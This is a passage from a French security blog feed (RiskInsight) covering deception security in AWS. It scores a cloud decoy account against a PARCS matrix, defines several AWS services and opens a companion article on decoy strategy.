<p style="text-align: justify;"><span data-contrast="none">AWS offre une approche de paiement à l&rsquo;utilisation pour la tarification de ses services cloud. Avec AWS, vous ne payez que les services dont vous avez besoin, tant que vous continuez à les utiliser et ce, sans contrat à long terme. Vous ne payez que les services que vous utilisez, et si vous cessez de vous en servir, aucun coût additionnel ou frais de résiliation ne vous sera facturé.</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<p style="text-align: justify;"><span data-contrast="none">Les services déployés dans le cadre de ce scénario n’ont pas vocation à être utilisé sauf dans le cas d’une intrusion donc d’un incident de sécurité. Les coûts associés sont donc négligeables.</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<p> </p>
<h2 style="text-align: justify;" aria-level="1"><span data-contrast="none">Evaluation du leurre avec la matrice PARCS</span><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:567,&quot;335559738&quot;:240,&quot;335559739&quot;:360,&quot;335559740&quot;:259,&quot;335559991&quot;:567}"> </span></h2>
<p style="text-align: justify;"><span data-contrast="none">Plusieurs critères permettent d’évaluer un leurre et voici les résultats de notre analyse au regard de la matrice PARCS :</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<ul style="text-align: justify;">
<li data-leveltext="" data-font="Symbol" data-listid="16" data-list-defn-props="{&quot;335552541&quot;:1,&quot;335559683&quot;:0,&quot;335559684&quot;:-2,&quot;335559685&quot;:360,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;&quot;,&quot;469777815&quot;:&quot;singleLevel&quot;}" aria-setsize="-1" data-aria-posinset="4" data-aria-level="1"><b><span data-contrast="none">P</span></b><span data-contrast="none">ertinence : 4/4</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:120,&quot;335559740&quot;:259,&quot;469777462&quot;:[360],&quot;469777927&quot;:[0],&quot;469777928&quot;:[8]}"> </span></li>
</ul>
<p style="text-align: justify;"><span data-contrast="none">« Diverses approches peuvent être adoptées pour efficacement repérer la compromission initiale d&rsquo;une instance EC2 et la propagation latérale d&rsquo;un attaquant Dans notre contexte, selon les ressources à notre disposition, une stratégie envisageable consiste à surveiller les opérations en analysant les journaux, ce qui permettra de détecter des actions malveillantes. Ces observations pourraient ensuite être utilisées pour générer des alertes destinées aux administrateurs. Par exemple, une alerte pourrait être déclenchée en cas de tentative d&rsquo;intrusion via une attaque de force brute sur le service RDP des instances EC2 au sein de notre environnement AWS, grâce à GuardDuty.</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:360,&quot;335559739&quot;:120,&quot;335559740&quot;:259,&quot;335559991&quot;:360,&quot;469777462&quot;:[360],&quot;469777927&quot;:[0],&quot;469777928&quot;:[8]}"> </span></p>
<p style="text-align: justify;"><span data-contrast="none">De plus, il serait possible d&rsquo;utiliser une combinaison de services AWS tels que CloudTrail et EventBridge pour établir des règles de détection et d&rsquo;automatisation des interventions en réponse à des activités spécifiques, notamment celles liées aux accès entre comptes (cross-account) et créer des règles de détection qui surveillent tous les événements d’endossement afin de déclencher les actions en cas d’événements correspondant.»</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:360,&quot;335559739&quot;:120,&quot;335559740&quot;:259,&quot;335559991&quot;:360,&quot;469777462&quot;:[360],&quot;469777927&quot;:[0],&quot;469777928&quot;:[8]}"> </span></p>
<ul style="text-align: justify;">
<li data-leveltext="" data-font="Symbol" data-listid="16" data-list-defn-props="{&quot;335552541&quot;:1,&quot;335559683&quot;:0,&quot;335559684&quot;:-2,&quot;335559685&quot;:360,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;&quot;,&quot;469777815&quot;:&quot;singleLevel&quot;}" aria-setsize="-1" data-aria-posinset="5" data-aria-level="1"><b><span data-contrast="none">A</span></b><span data-contrast="none">ttractivité : 4/4</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:120,&quot;335559740&quot;:259,&quot;469777462&quot;:[360],&quot;469777927&quot;:[0],&quot;469777928&quot;:[8]}"> </span></li>
</ul>
<p style="text-align: justify;"><span data-contrast="none">« Le leurre se distingue par un compte dédié, augmentant ainsi de manière significative son pouvoir d&rsquo;attraction. En ayant accès aux métadonnées de toutes les ressources à sa portée, l&rsquo;attaquant peut également vérifier divers niveaux de privilèges ce qui renforce substantiellement la crédibilité. Grâce à la capacité de visualiser les dates et heures des dernières utilisations des ressources dans son champ de vision, il peut en déduire que ces ressources sont rarement utilisées. Dans cette optique, une fonction lambda est mise en œuvre pour automatiser l&rsquo;exécution de différentes ressources ou leur authentification, garantissant ainsi des preuves d&rsquo;utilisation récentes. »</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:360,&quot;335559739&quot;:120,&quot;335559740&quot;:259,&quot;335559991&quot;:360,&quot;469777462&quot;:[360],&quot;469777927&quot;:[0],&quot;469777928&quot;:[8]}"> </span></p>
<ul style="text-align: justify;">
<li data-leveltext="" data-font="Symbol" data-listid="16" data-list-defn-props="{&quot;335552541&quot;:1,&quot;335559683&quot;:0,&quot;335559684&quot;:-2,&quot;335559685&quot;:360,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;&quot;,&quot;469777815&quot;:&quot;singleLevel&quot;}" aria-setsize="-1" data-aria-posinset="6" data-aria-level="1"><b><span data-contrast="none">R</span></b><span data-contrast="none">isqué : 4/4</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:120,&quot;335559740&quot;:259,&quot;469777462&quot;:[360],&quot;469777927&quot;:[0],&quot;469777928&quot;:[8]}"> </span></li>
</ul>
<p style="text-align: justify;"><span data-contrast="none">« L&rsquo;autorisation accordée au rôle IAM-RO ne confère des privilèges IAM à l&rsquo;attaquant que dans le contexte d&rsquo;un compte purement fictif. Grâce à une configuration appropriée de la SCP en amont, toutes les tentatives d&rsquo;actions du rôle Security-Audit seront également contrées. Les seuls éléments délibérément introduits dans un environnement réel sont les rôles Semi-Admin et Lambda-Auto, qui sont soumis à des politiques rigoureuses empêchant toute attribution de droits ou de privilèges en cas de tentative d&rsquo;utilisation malveillante. Ces politiques incluent un accès en lecture seule (IAMReadOnlyAccess) et une restriction empêchant toute modification des autorisations liées au rôle du compte, tel que défini par la SCP. »</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:360,&quot;335559739&quot;:120,&quot;335559740&quot;:259,&quot;335559991&quot;:360,&quot;469777462&quot;:[360],&quot;469777927&quot;:[0],&quot;469777928&quot;:[8]}"> </span></p>
<ul style="text-align: justify;">
<li data-leveltext="" data-font="Symbol" data-listid="16" data-list-defn-props="{&quot;335552541&quot;:1,&quot;335559683&quot;:0,&quot;335559684&quot;:-2,&quot;335559685&quot;:360,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;&quot;,&quot;469777815&quot;:&quot;singleLevel&quot;}" aria-setsize="-1" data-aria-posinset="7" data-aria-level="1"><b><span data-contrast="none">C</span></b><span data-contrast="none">rédibilité : 3/4</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:120,&quot;335559740&quot;:259,&quot;469777462&quot;:[360],&quot;469777927&quot;:[0],&quot;469777928&quot;:[8]}"> </span></li>
</ul>
<p style="text-align: justify;"><span data-contrast="none">« La crédibilité du leurre peut être remise en question en raison des ressources disponibles à sa disposition et des limitations potentielles, </span> <span data-contrast="none">notamment une Inline Policy qui restreint les autorisations et les actions possibles. Il est important de prendre en compte ces éléments, car ils peuvent susciter des doutes chez les attaquants et compromettre l&rsquo;efficacité du leurre. Il est donc crucial de mettre en place des mesures qui rendent le leurre aussi réaliste et convaincant que possible, en veillant à ce qu&rsquo;il ait accès aux ressources et aux autorisations pertinentes pour créer un scénario crédible. »</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:360,&quot;335559739&quot;:120,&quot;335559740&quot;:259,&quot;335559991&quot;:360,&quot;469777462&quot;:[360],&quot;469777927&quot;:[0],&quot;469777928&quot;:[8]}"> </span></p>
<ul style="text-align: justify;">
<li data-leveltext="" data-font="Symbol" data-listid="16" data-list-defn-props="{&quot;335552541&quot;:1,&quot;335559683&quot;:0,&quot;335559684&quot;:-2,&quot;335559685&quot;:360,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;&quot;,&quot;469777815&quot;:&quot;singleLevel&quot;}" aria-setsize="-1" data-aria-posinset="8" data-aria-level="1"><b><span data-contrast="none">S</span></b><span data-contrast="none">calabilité : 3/4</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:120,&quot;335559740&quot;:259,&quot;469777462&quot;:[360],&quot;469777927&quot;:[0],&quot;469777928&quot;:[8]}"> </span></li>
</ul>
<p style="text-align: justify;"><span data-contrast="none">« En fonction de la taille d’une infrastructure, il devient envisageable de mettre en place un déploiement et une maintenance fluides des composants, grâce à l&#8217;emploi de scripts automatisés habilités à exécuter des opérations sur les ressources. Toutefois, il est essentiel de garantir une surveillance minutieuse de l&rsquo;intégralité des ressources afin de consolider la sécurité face à d&rsquo;éventuelles atteintes et d&rsquo;assurer une réaction rapide pour défendre un périmètre étendu. »</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:360,&quot;335559739&quot;:120,&quot;335559740&quot;:259,&quot;335559991&quot;:360,&quot;469777462&quot;:[360],&quot;469777927&quot;:[0],&quot;469777928&quot;:[8]}"> </span></p>
<p style="text-align: justify;"><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:567,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<p style="text-align: justify;"><span data-contrast="none">En conclusion, la mise en œuvre d’un tel scénario de Deceptive Security dans le Cloud, offre une approche pour améliorer sa sécurité globale. Cela contribue à restreindre la capacité d&rsquo;un attaquant à explorer et à se propager à travers le réseau en présentant des chemins trompeurs, en retardant leur progression et en permettant une détection et des réponses plus rapides. Les leurres, qui ressemblent à des cibles attrayantes, détournent l&rsquo;attention et les ressources des attaquants des véritables actifs, ce qui accroît les chances de détection précoce.</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<p style="text-align: justify;"><span data-contrast="none">De plus, les mécanismes d&rsquo;alerte jouent un rôle crucial en fournissant des informations rapides sur les intrusions potentielles aux équipes de sécurité, ce qui permet une réponse rapide aux incidents et limite l&rsquo;impact des attaques.</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<p style="text-align: justify;"><span data-contrast="none">En combinant ces stratégies de défense, on renforce la posture de sécurité globale des environnements Cloud, on améliore leur résilience face aux cybermenaces en constante évolution et on garantit l&rsquo;intégrité et la confidentialité des données sensibles. </span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<p style="text-align: justify;"><span data-contrast="none">En utilisant ces mesures de sécurité trompeuses, les entreprises peuvent renforcer leur défense contre les cyberattaques. Toutefois, il est important de noter que la Deceptive Security ne remplace pas les solutions de cybersécurité standard existantes et que la protection contre les cyberattaques nécessite l&rsquo;utilisation de techniques de sécurité complémentaires pour une défense optimale.</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<p style="text-align: justify;"><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559685&quot;:0,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<p> </p>
<h3 style="text-align: justify;" aria-level="1"><span data-contrast="none">ANNEXES</span><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:567,&quot;335559738&quot;:240,&quot;335559739&quot;:360,&quot;335559740&quot;:259,&quot;335559991&quot;:567}"> &#8211; </span><span data-contrast="none">Services AWS</span><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:1418,&quot;335559738&quot;:240,&quot;335559739&quot;:120,&quot;335559740&quot;:259,&quot;335559991&quot;:851}"> </span></h3>
<p style="text-align: justify;"><i><span data-contrast="none">Les définitions suivantes sont issues de la source : AWS documentation → </span></i><i><span data-contrast="none">docs.aws.amazon.com</span></i><i><span data-contrast="none">.</span></i><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<p style="text-align: justify;"><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span><b><span data-contrast="none">SCP – Politiques de contrôle de services</span></b><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> : </span><span data-contrast="none">Les politiques de contrôle de services sont un type de politique permettant de contrôler de manière centrale les autorisations. Cela permet de veiller à ce que les grandes directives soient respecter pour tous les comptes AWS de l’organisation.</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<p style="text-align: justify;" aria-level="4"><b><span data-contrast="none">EC2 – Elastic Compute Cloud</span></b><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> : </span><span data-contrast="none">AWS EC2 permet de louer des serveurs (des instances EC2) pour répondre au mieux aux besoins de la charge de travail.</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<p style="text-align: justify;" aria-level="4"><b><span data-contrast="none">STS – Security Token Service</span></b><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> : </span><span data-contrast="none">AWS STS permet de demander des informations d&rsquo;identification de sécurité temporaires pour les ressources AWS. Cela permet d’attribuer un </span><b><span data-contrast="none">accès temporaire</span></b><span data-contrast="none"> aux ressources via des appels API, la console AWS ou le CLI (</span><i><span data-contrast="none">Console Line Interface</span></i><span data-contrast="none">) AWS.</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<p style="text-align: justify;"><i><span data-contrast="none">À noter :</span></i><i><span data-contrast="none"> Chaque jeton STS possède un cycle de vie, défini lors de la création de celui-ci, pouvant aller entre 15 minutes et 36 heures.</span></i><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<p style="text-align: justify;" aria-level="4"><b><span data-contrast="none">CloudTrail</span></b><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> : </span><span data-contrast="none">AWS CloudTrail est un service qui enregistre les actions effectuées par un utilisateur, un rôle ou un service AWS.</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<p style="text-align: justify;" aria-level="4"><b><span data-contrast="none">Fonction Lambda</span></b><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> : </span><span data-contrast="none">La fonction Lambda est un service permettant d&rsquo;exécuter du code.</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<p style="text-align: justify;" aria-level="4"><b><span data-contrast="none">SNS &#8211; Simple Notification Service</span></b><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> : </span><span data-contrast="none">Amazon SNS est un service web permettant de gérer l&rsquo;envoi de messages (SMS, e-mails, HTTP.S, etc.).</span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120,&quot;335559740&quot;:259}"> </span></p>
<p style="text-align: justify;"><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<p style="text-align: justify;"><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<p> </p>
<p style="text-align: justify;"><i><span data-contrast="none">Merci à Charles BULABULA pour sa contribution à cet article.</span></i><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2024/02/deceptive-security-la-solution-pour-une-detection-efficace-dans-le-cloud-exemple-dapplication-de-la-deceptive-dans-le-cloud-aws/">Deceptive Security : la solution pour une détection efficace dans le Cloud ? &#8211; Exemple d’application de la Deceptive dans le Cloud AWS </a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://www.riskinsight-wavestone.com/2024/02/deceptive-security-la-solution-pour-une-detection-efficace-dans-le-cloud-exemple-dapplication-de-la-deceptive-dans-le-cloud-aws/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Deceptive Security : la solution pour une détection efficace dans le Cloud ? &#8211; Stratégie de leurrage</title>
		<link>https://www.riskinsight-wavestone.com/2024/01/deceptive-security-la-solution-pour-une-detection-efficace-dans-le-cloud-strategie-de-leurrage/</link>
					<comments>https://www.riskinsight-wavestone.com/2024/01/deceptive-security-la-solution-pour-une-detection-efficace-dans-le-cloud-strategie-de-leurrage/#respond</comments>
		
		<dc:creator><![CDATA[Etienne Lafore]]></dc:creator>
		<pubDate>Tue, 30 Jan 2024 17:21:56 +0000</pubDate>
				<category><![CDATA[Eclairage]]></category>
		<category><![CDATA[Cloud]]></category>
		<category><![CDATA[Deceptive security]]></category>
		<category><![CDATA[leurre]]></category>
		<guid isPermaLink="false">https://www.riskinsight-wavestone.com/?p=22329</guid>

					<description><![CDATA[<p>Aujourd&#8217;hui, les cyber-attaques font partie de notre quotidien et deviennent de plus en plus nombreuses et sophistiquées.  Par ailleurs, nous évoluons vers des Systèmes d’Information construits sur une diversité d’environnements de plus en plus vaste, notamment grâce au Cloud, maintenant...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2024/01/deceptive-security-la-solution-pour-une-detection-efficace-dans-le-cloud-strategie-de-leurrage/">Deceptive Security : la solution pour une détection efficace dans le Cloud ? &#8211; Stratégie de leurrage</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p style="text-align: justify;"><span data-contrast="none">Aujourd&rsquo;hui, les cyber-attaques font partie de notre quotidien et deviennent de plus en plus nombreuses et sophistiquées.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120}"> </span></p>
<p style="text-align: justify;"><span data-contrast="none">Par ailleurs, nous évoluons vers des Systèmes d’Information construits sur une diversité d’environnements de plus en plus vaste, notamment grâce au </span><b><span data-contrast="none">Cloud, </span></b><span data-contrast="none">maintenant omniprésent dans les SI des entreprises. Cela leur permet d’élargir leurs capacités mais, d’un point de vue sécurité, accroît la surface et les risques d’attaques.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120}"> </span></p>
<p style="text-align: justify;"><span data-contrast="none">Des techniques classiques de protection et de détection contre les intrusions existent déjà et se développent de manière exponentielle. Celles-ci sont efficaces pour les attaques les plus courantes mais ne sont bien souvent pas ou peu adaptées aux spécificités du Cloud.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120}"> </span></p>
<p style="text-align: justify;"><span data-contrast="none">Ainsi, des questions se posent sur l’utilisation de </span><b><span data-contrast="none">stratégies proactives</span></b><span data-contrast="none">, telle que la </span><b><span data-contrast="none">Deceptive Security</span></b><span data-contrast="none">, permettant de garder une longueur d&rsquo;avance sur les attaquants. Notamment dans le cadre de Cyber-Résilience : comment utiliser ce genre de technologie sur des environnements de types traditionnels et Cloud ?</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120}"> </span></p>
<p style="text-align: justify;"><i><span data-contrast="none">Dans quels cas utiliser des techniques de Deceptive Security ? Est-ce que les solutions de Deceptive Security dans le Cloud sont développées aujourd’hui ? Y a-t-il des stratégies spécifiques à envisager dans le cadre d’un environnement Cloud comparé au traditionnel ? </span></i></p>
<p style="text-align: justify;">Nous répondrons à ces questions dans une <strong>mini-série de 2 articles</strong>. Dans le premier article, nous vous montrerons comment développer et évaluer votre stratégie de leurre. Dans le second article, nous présenterons un exemple pratique de sécurité trompeuse dans AWS.</p>
<h1 aria-level="1"> </h1>
<h1 style="text-align: justify;" aria-level="1"><span data-contrast="none">Elaborer et évaluer sa stratégie de leurrage</span><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:567,&quot;335559738&quot;:240,&quot;335559739&quot;:360,&quot;335559991&quot;:567}"> </span></h1>
<h2 style="text-align: justify;" aria-level="1"><span data-contrast="none">Ambitions de la Deceptive Security</span><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:567,&quot;335559738&quot;:240,&quot;335559739&quot;:360,&quot;335559991&quot;:567}"> </span></h2>
<h3 style="text-align: justify;" aria-level="2"><span data-contrast="none">La Deceptive Security dans les grandes lignes</span><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:1418,&quot;335559738&quot;:240,&quot;335559739&quot;:120,&quot;335559991&quot;:851}"> </span></h3>
<p style="text-align: justify;"><span data-contrast="none">La « </span><b><span data-contrast="none">Deceptive Security</span></b> <span data-contrast="none">» (désignée par « Deceptive » dans la suite de l’article), ou « </span><b><span data-contrast="none">leurrage numérique</span></b><span data-contrast="none"> », est une technique de cyberdéfense qui </span><b><span data-contrast="none">fait face à l’intrusion d’attaquants dans un SI</span></b><span data-contrast="none"> (Système d’Information). Ceci fonctionne grâce à la </span><b><span data-contrast="none">mise en place de pièges et/ou leurres</span></b><span data-contrast="none"> dans un SI. Ces derniers ont pour objectif d’</span><b><span data-contrast="none">imiter des technologiques légitimes </span></b><span data-contrast="none">pour</span> <span data-contrast="none">ne pas être repérés.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120}"> </span></p>
<p style="text-align: justify;"><span data-contrast="none">Cette méthode permet de </span><b><span data-contrast="none">détecter</span></b><span data-contrast="none"> des intrusions en générant des alertes, d’</span><b><span data-contrast="none">empêcher de nuire </span></b><span data-contrast="none">à l’infrastructure réelle mais aussi d’</span><b><span data-contrast="none">observer </span></b><span data-contrast="none">les pratiques utilisées par l’attaquant.</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120}"> </span></p>
<p style="text-align: justify;"><span data-contrast="none">Avant d’entamer ce sujet dans les détails, il est conseillé de parcourir l’article « </span><a href="https://www.riskinsight-wavestone.com/2017/11/deceptive-security-comment-arroser-larroseur/"><span data-contrast="none">Deceptive Security : comment arroser l’arroseur ?</span></a><span data-contrast="none"> » qui décrit les principaux concepts de la « </span><b><span data-contrast="none">Deceptive Security</span></b> <span data-contrast="none">».</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120}"> </span></p>
<h3 style="text-align: justify;" aria-level="2"><span data-contrast="none">Les grands objectifs de la Deceptive</span><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:1418,&quot;335559738&quot;:240,&quot;335559739&quot;:120,&quot;335559991&quot;:851}"> </span></h3>
<p style="text-align: justify;"><span data-contrast="none">L’utilisation de la Deceptive sur un SI peut avoir plusieurs objectifs :</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559685&quot;:0,&quot;335559739&quot;:120}"> </span></p>
<ul style="text-align: justify;">
<li data-leveltext="" data-font="Symbol" data-listid="12" data-list-defn-props="{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:360,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Symbol&quot;,&quot;469769242&quot;:[8226],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;&quot;,&quot;469777815&quot;:&quot;singleLevel&quot;}" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><b><span data-contrast="none">Détecter</span></b><span data-contrast="none"> une intrusion</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:120,&quot;469777462&quot;:[360],&quot;469777927&quot;:[0],&quot;469777928&quot;:[8]}"> </span></li>
